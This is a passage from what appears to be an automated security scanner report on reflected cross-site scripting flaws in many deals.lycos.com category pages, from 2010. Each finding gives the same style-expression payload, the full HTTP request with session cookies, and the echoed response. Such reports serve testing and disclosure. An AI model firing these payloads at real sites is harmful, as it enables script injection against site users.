<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;2e0b4"style="x:expression(alert(1))"76383e47512=1">
...[SNIP]...

1.30. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c906"style="x:expression(alert(1))"2a42ce649cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/clothing-and-accessories-202?2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;2c906"style="x:expression(alert(1))"2a42ce649cd=1">
...[SNIP]...

1.31. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6c7a"style="x:expression(alert(1))"5a17236f13a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/computer-39?e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e6c7a"style="x:expression(alert(1))"5a17236f13a=1">
...[SNIP]...

1.32. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688cc"style="x:expression(alert(1))"fbe0d430e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/digital-cameras-168?688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;688cc"style="x:expression(alert(1))"fbe0d430e89=1">
...[SNIP]...

1.33. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as daf23"style="x:expression(alert(1))"a3aefb6c21b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/electronics-142?daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;daf23"style="x:expression(alert(1))"a3aefb6c21b=1">
...[SNIP]...

1.34. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e037e"style="x:expression(alert(1))"f64d12d06a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/gaming-and-toys-186?e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e037e"style="x:expression(alert(1))"f64d12d06a2=1">
...[SNIP]...

1.35. http://deals.lycos.com/deals/category/health-and-beauty-228 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/health-and-beauty-228

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b70e3"style="x:expression(alert(1))"c8c79da67d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/health-and-beauty-228?b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b70e3"style="x:expression(alert(1))"c8c79da67d5=1">
...[SNIP]...

1.36. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15b6e"style%3d"x%3aexpression(alert(1))"da228453765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15b6e"style="x:expression(alert(1))"da228453765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/home-and-garden-196?15b6e"style%3d"x%3aexpression(alert(1))"da228453765=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;15b6e"style="x:expression(alert(1))"da228453765=1">
...[SNIP]...

1.37. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44fe"style="x:expression(alert(1))"9561e55b253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/lcd-tvs-424?c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;c44fe"style="x:expression(alert(1))"9561e55b253=1">
...[SNIP]...

1.38. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0cfa"style="x:expression(alert(1))"f4ca06b8abd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/movies-music-books-178?b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b0cfa"style="x:expression(alert(1))"f4ca06b8abd=1">
...[SNIP]...

1.39. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7d05"style="x:expression(alert(1))"683cdf99577 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/mp3-players-144?e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e7d05"style="x:expression(alert(1))"683cdf99577=1">
...[SNIP]...

1.40. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80659"style%3d"x%3aexpression(alert(1))"5affdd2a85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80659"style="x:expression(alert(1))"5affdd2a85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/office-and-supplies-182?80659"style%3d"x%3aexpression(alert(1))"5affdd2a85=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;80659"style="x:expression(alert(1))"5affdd2a85=1">
...[SNIP]...

1.41. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99553"style="x:expression(alert(1))"74c4b97e54d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/pc-computers-47?99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;99553"style="x:expression(alert(1))"74c4b97e54d=1">
...[SNIP]...

1.42. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1636"style%3d"x%3aexpression(alert(1))"804d8716915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1636"style="x:expression(alert(1))"804d8716915 in the application's response.

